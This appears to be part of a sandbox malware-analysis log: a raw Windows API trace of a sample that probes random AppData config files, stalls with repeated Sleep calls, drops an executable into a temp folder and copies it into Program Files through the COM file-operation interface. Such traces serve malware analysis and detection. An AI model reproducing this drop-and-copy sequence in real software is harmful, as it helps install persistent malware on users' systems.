NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.225] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.226] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.226] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.226] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0228.226] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.226] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.226] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.226] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.226] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.226] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.227] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0228.227] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.227] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.227] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0228.227] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0228.227] Sleep (dwMilliseconds=0x7d0) [0228.230] Sleep (dwMilliseconds=0x7d0) [0228.232] Sleep (dwMilliseconds=0x7d0) [0228.234] Sleep (dwMilliseconds=0x7d0) [0228.235] Sleep (dwMilliseconds=0x7d0) [0228.237] Sleep (dwMilliseconds=0x7d0) [0228.238] Sleep (dwMilliseconds=0x7d0) [0228.240] Sleep (dwMilliseconds=0x7d0) [0228.241] Sleep (dwMilliseconds=0x7d0) [0228.243] Sleep (dwMilliseconds=0x7d0) [0228.244] Sleep (dwMilliseconds=0x7d0) [0228.246] Sleep (dwMilliseconds=0x7d0) [0228.247] Sleep (dwMilliseconds=0x7d0) [0228.249] Sleep (dwMilliseconds=0x7d0) [0228.250] Sleep (dwMilliseconds=0x7d0) [0228.252] Sleep (dwMilliseconds=0x7d0) [0228.254] Sleep (dwMilliseconds=0x7d0) [0228.256] Sleep (dwMilliseconds=0x7d0) [0228.257] Sleep (dwMilliseconds=0x7d0) [0228.260] Sleep (dwMilliseconds=0x7d0) [0228.262] Sleep (dwMilliseconds=0x7d0) [0228.263] Sleep (dwMilliseconds=0x7d0) [0228.266] Sleep (dwMilliseconds=0x7d0) [0228.267] Sleep (dwMilliseconds=0x7d0) [0228.269] Sleep (dwMilliseconds=0x7d0) [0228.272] Sleep (dwMilliseconds=0x7d0) [0228.275] Sleep (dwMilliseconds=0x7d0) [0228.277] Sleep (dwMilliseconds=0x7d0) [0228.278] Sleep (dwMilliseconds=0x7d0) [0228.280] Sleep (dwMilliseconds=0x7d0) [0228.281] Sleep (dwMilliseconds=0x7d0) [0228.283] Sleep (dwMilliseconds=0x7d0) [0228.302] Sleep (dwMilliseconds=0x7d0) [0228.304] Sleep (dwMilliseconds=0x7d0) [0228.306] Sleep (dwMilliseconds=0x7d0) [0228.307] Sleep (dwMilliseconds=0x7d0) [0228.308] Sleep (dwMilliseconds=0x7d0) [0228.316] Sleep (dwMilliseconds=0x7d0) [0228.319] Sleep (dwMilliseconds=0x7d0) [0228.320] Sleep (dwMilliseconds=0x7d0) [0228.322] Sleep (dwMilliseconds=0x7d0) [0228.323] Sleep (dwMilliseconds=0x7d0) [0228.327] Sleep (dwMilliseconds=0x7d0) [0228.329] Sleep (dwMilliseconds=0x7d0) [0228.331] Sleep (dwMilliseconds=0x7d0) [0228.332] Sleep (dwMilliseconds=0x7d0) [0228.334] Sleep (dwMilliseconds=0x7d0) [0228.335] Sleep (dwMilliseconds=0x7d0) [0228.338] Sleep (dwMilliseconds=0x7d0) [0228.340] Sleep (dwMilliseconds=0x7d0) [0228.342] Sleep (dwMilliseconds=0x7d0) [0228.343] Sleep (dwMilliseconds=0x7d0) [0228.345] Sleep (dwMilliseconds=0x7d0) [0228.346] Sleep (dwMilliseconds=0x7d0) [0228.349] Sleep (dwMilliseconds=0x7d0) [0228.352] Sleep (dwMilliseconds=0x7d0) [0228.357] Sleep (dwMilliseconds=0x7d0) [0228.359] Sleep (dwMilliseconds=0x7d0) [0228.360] Sleep (dwMilliseconds=0x7d0) [0228.362] Sleep (dwMilliseconds=0x7d0) [0228.363] Sleep (dwMilliseconds=0x7d0) [0228.365] Sleep (dwMilliseconds=0x7d0) [0228.366] Sleep (dwMilliseconds=0x7d0) [0228.368] Sleep (dwMilliseconds=0x7d0) [0228.383] Sleep (dwMilliseconds=0x7d0) [0228.387] Sleep (dwMilliseconds=0x7d0) [0228.389] Sleep (dwMilliseconds=0x7d0) [0228.393] Sleep (dwMilliseconds=0x7d0) [0228.396] Sleep (dwMilliseconds=0x7d0) [0228.398] Sleep (dwMilliseconds=0x7d0) [0228.399] Sleep (dwMilliseconds=0x7d0) [0228.401] Sleep (dwMilliseconds=0x7d0) [0228.402] Sleep (dwMilliseconds=0x7d0) [0228.404] Sleep (dwMilliseconds=0x7d0) [0228.405] Sleep (dwMilliseconds=0x7d0) [0228.407] Sleep (dwMilliseconds=0x7d0) [0228.409] Sleep (dwMilliseconds=0x7d0) [0228.411] Sleep (dwMilliseconds=0x7d0) [0228.412] Sleep (dwMilliseconds=0x7d0) [0228.414] Sleep (dwMilliseconds=0x7d0) [0228.417] Sleep (dwMilliseconds=0x7d0) [0228.419] Sleep (dwMilliseconds=0x7d0) [0228.420] Sleep (dwMilliseconds=0x7d0) [0228.422] Sleep (dwMilliseconds=0x7d0) [0228.424] Sleep (dwMilliseconds=0x7d0) [0228.427] Sleep (dwMilliseconds=0x7d0) [0228.429] Sleep (dwMilliseconds=0x7d0) [0228.431] Sleep (dwMilliseconds=0x7d0) [0228.433] Sleep (dwMilliseconds=0x7d0) [0228.434] Sleep (dwMilliseconds=0x7d0) [0228.436] Sleep (dwMilliseconds=0x7d0) [0228.438] Sleep (dwMilliseconds=0x7d0) [0228.441] Sleep (dwMilliseconds=0x7d0) [0228.442] Sleep (dwMilliseconds=0x7d0) [0228.444] Sleep (dwMilliseconds=0x7d0) [0228.445] Sleep (dwMilliseconds=0x7d0) [0228.447] Sleep (dwMilliseconds=0x7d0) [0228.448] Sleep (dwMilliseconds=0x7d0) [0228.450] Sleep (dwMilliseconds=0x7d0) [0228.451] Sleep (dwMilliseconds=0x7d0) [0228.453] Sleep (dwMilliseconds=0x7d0) [0228.454] Sleep (dwMilliseconds=0x7d0) [0228.456] Sleep (dwMilliseconds=0x7d0) [0228.457] Sleep (dwMilliseconds=0x7d0) [0228.459] Sleep (dwMilliseconds=0x7d0) [0228.461] Sleep (dwMilliseconds=0x7d0) [0228.463] Sleep (dwMilliseconds=0x7d0) [0228.465] Sleep (dwMilliseconds=0x7d0) [0228.467] Sleep (dwMilliseconds=0x7d0) [0228.468] Sleep (dwMilliseconds=0x7d0) [0228.472] Sleep (dwMilliseconds=0x7d0) [0228.477] Sleep (dwMilliseconds=0x7d0) [0228.578] Sleep (dwMilliseconds=0x7d0) [0228.588] Sleep (dwMilliseconds=0x7d0) [0228.589] Sleep (dwMilliseconds=0x7d0) [0228.591] Sleep (dwMilliseconds=0x7d0) [0228.598] Sleep (dwMilliseconds=0x7d0) [0228.599] Sleep (dwMilliseconds=0x7d0) [0228.601] Sleep (dwMilliseconds=0x7d0) [0228.602] Sleep (dwMilliseconds=0x7d0) [0228.627] Sleep (dwMilliseconds=0x7d0) [0228.637] Sleep (dwMilliseconds=0x7d0) [0228.644] Sleep (dwMilliseconds=0x7d0) [0228.645] Sleep (dwMilliseconds=0x7d0) [0228.647] Sleep (dwMilliseconds=0x7d0) [0228.651] Sleep (dwMilliseconds=0x7d0) [0228.653] Sleep (dwMilliseconds=0x7d0) [0228.654] Sleep (dwMilliseconds=0x7d0) [0228.656] Sleep (dwMilliseconds=0x7d0) [0228.657] Sleep (dwMilliseconds=0x7d0) [0228.659] Sleep (dwMilliseconds=0x7d0) [0228.661] Sleep (dwMilliseconds=0x7d0) [0228.662] Sleep (dwMilliseconds=0x7d0) [0228.664] Sleep (dwMilliseconds=0x7d0) [0228.665] Sleep (dwMilliseconds=0x7d0) [0228.667] Sleep (dwMilliseconds=0x7d0) [0228.669] Sleep (dwMilliseconds=0x7d0) [0228.683] Sleep (dwMilliseconds=0x7d0) [0228.685] Sleep (dwMilliseconds=0x7d0) [0228.686] Sleep (dwMilliseconds=0x7d0) [0228.688] Sleep (dwMilliseconds=0x7d0) [0228.689] Sleep (dwMilliseconds=0x7d0) [0228.691] Sleep (dwMilliseconds=0x7d0) [0228.694] Sleep (dwMilliseconds=0x7d0) [0228.696] Sleep (dwMilliseconds=0x7d0) [0228.711] Sleep (dwMilliseconds=0x7d0) [0228.713] Sleep (dwMilliseconds=0x7d0) [0228.714] Sleep (dwMilliseconds=0x7d0) [0228.716] Sleep (dwMilliseconds=0x7d0) [0228.717] Sleep (dwMilliseconds=0x7d0) [0228.719] Sleep (dwMilliseconds=0x7d0) [0228.721] Sleep (dwMilliseconds=0x7d0) [0228.722] Sleep (dwMilliseconds=0x7d0) [0228.725] Sleep (dwMilliseconds=0x7d0) [0228.727] Sleep (dwMilliseconds=0x7d0) [0228.740] Sleep (dwMilliseconds=0x7d0) [0228.742] Sleep (dwMilliseconds=0x7d0) [0228.747] Sleep (dwMilliseconds=0x7d0) [0228.749] Sleep (dwMilliseconds=0x7d0) [0228.751] Sleep (dwMilliseconds=0x7d0) [0228.752] Sleep (dwMilliseconds=0x7d0) [0228.760] Sleep (dwMilliseconds=0x7d0) [0228.762] Sleep (dwMilliseconds=0x7d0) [0228.763] Sleep (dwMilliseconds=0x7d0) [0228.765] Sleep (dwMilliseconds=0x7d0) [0228.766] Sleep (dwMilliseconds=0x7d0) [0228.768] Sleep (dwMilliseconds=0x7d0) [0228.770] Sleep (dwMilliseconds=0x7d0) [0228.772] Sleep (dwMilliseconds=0x7d0) [0228.773] Sleep (dwMilliseconds=0x7d0) [0228.775] Sleep (dwMilliseconds=0x7d0) [0228.776] Sleep (dwMilliseconds=0x7d0) [0228.785] Sleep (dwMilliseconds=0x7d0) [0228.787] Sleep (dwMilliseconds=0x7d0) [0228.793] Sleep (dwMilliseconds=0x7d0) [0228.794] Sleep (dwMilliseconds=0x7d0) [0228.796] Sleep (dwMilliseconds=0x7d0) [0228.797] Sleep (dwMilliseconds=0x7d0) [0228.803] Sleep (dwMilliseconds=0x7d0) [0228.805] Sleep (dwMilliseconds=0x7d0) [0228.806] Sleep (dwMilliseconds=0x7d0) [0228.808] Sleep (dwMilliseconds=0x7d0) [0228.810] Sleep (dwMilliseconds=0x7d0) [0228.811] Sleep (dwMilliseconds=0x7d0) [0228.813] Sleep (dwMilliseconds=0x7d0) [0228.816] Sleep (dwMilliseconds=0x7d0) [0228.818] Sleep (dwMilliseconds=0x7d0) [0228.819] Sleep (dwMilliseconds=0x7d0) [0228.821] Sleep (dwMilliseconds=0x7d0) [0228.825] Sleep (dwMilliseconds=0x7d0) [0228.826] Sleep (dwMilliseconds=0x7d0) [0228.828] Sleep (dwMilliseconds=0x7d0) [0228.830] Sleep (dwMilliseconds=0x7d0) [0228.838] Sleep (dwMilliseconds=0x7d0) [0228.840] Sleep (dwMilliseconds=0x7d0) [0228.842] Sleep (dwMilliseconds=0x7d0) [0228.845] Sleep (dwMilliseconds=0x7d0) [0228.846] Sleep (dwMilliseconds=0x7d0) [0228.848] Sleep (dwMilliseconds=0x7d0) [0228.850] Sleep (dwMilliseconds=0x7d0) [0228.851] Sleep (dwMilliseconds=0x7d0) [0228.854] Sleep (dwMilliseconds=0x7d0) [0228.856] Sleep (dwMilliseconds=0x7d0) [0228.858] Sleep (dwMilliseconds=0x7d0) [0228.860] Sleep (dwMilliseconds=0x7d0) [0228.862] Sleep (dwMilliseconds=0x7d0) [0228.863] Sleep (dwMilliseconds=0x7d0) [0228.865] Sleep (dwMilliseconds=0x7d0) [0228.869] Sleep (dwMilliseconds=0x7d0) [0228.870] Sleep (dwMilliseconds=0x7d0) [0228.872] Sleep (dwMilliseconds=0x7d0) [0228.873] Sleep (dwMilliseconds=0x7d0) [0228.875] Sleep (dwMilliseconds=0x7d0) [0228.885] Sleep (dwMilliseconds=0x7d0) [0228.886] Sleep (dwMilliseconds=0x7d0) [0228.892] Sleep (dwMilliseconds=0x7d0) [0228.894] Sleep (dwMilliseconds=0x7d0) [0228.896] Sleep (dwMilliseconds=0x7d0) [0228.897] Sleep (dwMilliseconds=0x7d0) [0228.899] Sleep (dwMilliseconds=0x7d0) [0228.900] Sleep (dwMilliseconds=0x7d0) [0228.902] Sleep (dwMilliseconds=0x7d0) [0228.903] Sleep (dwMilliseconds=0x7d0) [0228.905] Sleep (dwMilliseconds=0x7d0) [0228.906] Sleep (dwMilliseconds=0x7d0) [0228.908] Sleep (dwMilliseconds=0x7d0) [0228.915] Sleep (dwMilliseconds=0x7d0) [0228.917] Sleep (dwMilliseconds=0x7d0) [0234.840] Sleep (dwMilliseconds=0x7d0) [0235.234] Sleep (dwMilliseconds=0x7d0) [0235.341] Sleep (dwMilliseconds=0x7d0) [0235.432] Sleep (dwMilliseconds=0x7d0) [0235.862] Sleep (dwMilliseconds=0x7d0) [0235.921] Sleep (dwMilliseconds=0x7d0) [0235.982] Sleep (dwMilliseconds=0x7d0) [0236.056] Sleep (dwMilliseconds=0x7d0) [0236.117] Sleep (dwMilliseconds=0x7d0) [0236.174] Sleep (dwMilliseconds=0x7d0) [0236.254] Sleep (dwMilliseconds=0x7d0) [0236.322] Sleep (dwMilliseconds=0x7d0) [0236.386] Sleep (dwMilliseconds=0x7d0) [0236.445] Sleep (dwMilliseconds=0x7d0) [0236.511] Sleep (dwMilliseconds=0x7d0) [0236.643] Sleep (dwMilliseconds=0x7d0) [0236.696] Sleep (dwMilliseconds=0x7d0) [0236.748] Sleep (dwMilliseconds=0x7d0) [0236.900] Sleep (dwMilliseconds=0x7d0) [0236.983] Sleep (dwMilliseconds=0x7d0) [0237.060] Sleep (dwMilliseconds=0x7d0) [0237.089] Sleep (dwMilliseconds=0x7d0) [0237.097] Sleep (dwMilliseconds=0x7d0) [0237.177] Sleep (dwMilliseconds=0x7d0) [0237.296] Sleep (dwMilliseconds=0x7d0) [0237.399] Sleep (dwMilliseconds=0x7d0) [0237.623] Sleep (dwMilliseconds=0x7d0) [0237.740] Sleep (dwMilliseconds=0x7d0) [0237.851] Sleep (dwMilliseconds=0x7d0) [0237.985] Sleep (dwMilliseconds=0x7d0) [0238.062] Sleep (dwMilliseconds=0x7d0) [0238.090] Sleep (dwMilliseconds=0x7d0) [0238.106] Sleep (dwMilliseconds=0x7d0) [0238.127] Sleep (dwMilliseconds=0x7d0) [0238.189] Sleep (dwMilliseconds=0x7d0) [0238.541] Sleep (dwMilliseconds=0x7d0) [0238.600] Sleep (dwMilliseconds=0x7d0) [0238.832] Sleep (dwMilliseconds=0x7d0) [0238.950] Sleep (dwMilliseconds=0x7d0) [0239.061] Sleep (dwMilliseconds=0x7d0) [0239.948] Sleep (dwMilliseconds=0x7d0) [0240.046] Sleep (dwMilliseconds=0x7d0) [0240.152] Sleep (dwMilliseconds=0x7d0) [0240.376] Sleep (dwMilliseconds=0x7d0) [0240.853] Sleep (dwMilliseconds=0x7d0) [0240.961] Sleep (dwMilliseconds=0x7d0) [0241.206] Sleep (dwMilliseconds=0x7d0) [0241.408] Sleep (dwMilliseconds=0x7d0) [0241.543] Sleep (dwMilliseconds=0x7d0) [0241.663] Sleep (dwMilliseconds=0x7d0) [0241.718] Sleep (dwMilliseconds=0x7d0) [0242.075] Sleep (dwMilliseconds=0x7d0) [0242.112] Sleep (dwMilliseconds=0x7d0) [0242.123] Sleep (dwMilliseconds=0x7d0) [0242.158] Sleep (dwMilliseconds=0x7d0) [0242.222] Sleep (dwMilliseconds=0x7d0) [0242.339] Sleep (dwMilliseconds=0x7d0) [0242.410] Sleep (dwMilliseconds=0x7d0) [0242.645] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0x1302fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0242.645] NtCreateFile (in: FileHandle=0x1302fd40, DesiredAccess=0x120089, ObjectAttributes=0x1302fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe" (normalized: "c:\\program files (x86)\\lbxhx9hm\\1byd2dsxipq.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fd40*=0xffffffffffffffff, IoStatusBlock=0x1302fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0242.646] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fcc0 | out: HeapArray=0x1302fcc0*=0x5c0000) returned 0x6 [0242.646] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f44f90) returned 1 [0242.942] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Lbxhx9hm" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\lbxhx9hm"), lpSecurityAttributes=0x0) returned 1 [0242.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0x1302f910, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0242.943] NtCreateFile (in: FileHandle=0x1302f8b0, DesiredAccess=0x12019f, ObjectAttributes=0x1302f920*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Lbxhx9hm\\1byd2dsxipq.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\lbxhx9hm\\1byd2dsxipq.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302f8c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302f8b0*=0x1fd8, IoStatusBlock=0x1302f8c0*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0242.944] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f830 | out: HeapArray=0x1302f830*=0x5c0000) returned 0x6 [0242.944] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f88f00) returned 1 [0242.965] NtQueryInformationFile (in: FileHandle=0x1fd8, IoStatusBlock=0x1302f8c0, FileInformation=0x1302f8d0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1302f8c0, FileInformation=0x1302f8d0) returned 0x0 [0242.974] NtWriteFile (in: FileHandle=0x1fd8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x1302f8c0, Buffer=0x122df840*, Length=0x1400, ByteOffset=0x1302f8b8*=0, Key=0x0 | out: IoStatusBlock=0x1302f8c0, Buffer=0x122df840*) returned 0x0 [0242.976] NtClose (Handle=0x1fd8) returned 0x0 [0242.976] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0242.977] CoCreateInstance (in: rclsid=0x82bc47e*(Data1=0x3ad05575, Data2=0x8857, Data3=0x4850, Data4=([0]=0x92, [1]=0x77, [2]=0x11, [3]=0xb8, [4]=0x5b, [5]=0xdb, [6]=0x8e, [7]=0x9)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x82bc48e*(Data1=0x947aab5f, Data2=0xa5c, Data3=0x4c13, Data4=([0]=0xb4, [1]=0xd6, [2]=0x4b, [3]=0xf7, [4]=0x83, [5]=0x6f, [6]=0xc9, [7]=0xf8)), ppv=0x1302fe10 | out: ppv=0x1302fe10*=0x9fec890) returned 0x0 [0242.984] FileOperation:IFileOperation:SetOperationFlags (This=0x9fec890, dwOperationFlags=0x10840414) returned 0x0 [0242.984] SHCreateItemFromParsingName (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Lbxhx9hm", pbc=0x0, riid=0x82bc46e*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x1302fe28 | out: ppv=0x1302fe28*=0x9e47e58) returned 0x0 [0243.134] SHCreateItemFromParsingName (in: pszPath="C:\\Program Files (x86)", pbc=0x0, riid=0x82bc46e*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x1302fe20 | out: ppv=0x1302fe20*=0x9e45fb8) returned 0x0 [0243.140] FileOperation:IFileOperation:CopyItem (This=0x9fec890, psiItem=0x9e47e58, psiDestinationFolder=0x9e45fb8, pszCopyName="Lbxhx9hm", pfopsItem=0x0) returned 0x0 [0243.141] FileOperation:IFileOperation:PerformOperations (This=0x9fec890) Thread: id = 166 os_tid = 0x1194 Thread: id = 167 os_tid = 0xc80 Thread: id = 168 os_tid = 0xf8c Thread: id = 169 os_tid = 0x924 Thread: id = 170 os_tid = 0x930 Thread: id = 171 os_tid = 0xb10 Thread: id = 172 os_tid = 0x91c Thread: id = 173 os_tid = 0xb64 Thread: id = 174 os_tid = 0x1368 Thread: id = 175 os_tid = 0xc94 Thread: id = 176 os_tid = 0x99c Process: id = "5" image_name = "systray.exe" filename = "c:\\windows\\syswow64\\systray.exe" page_root = 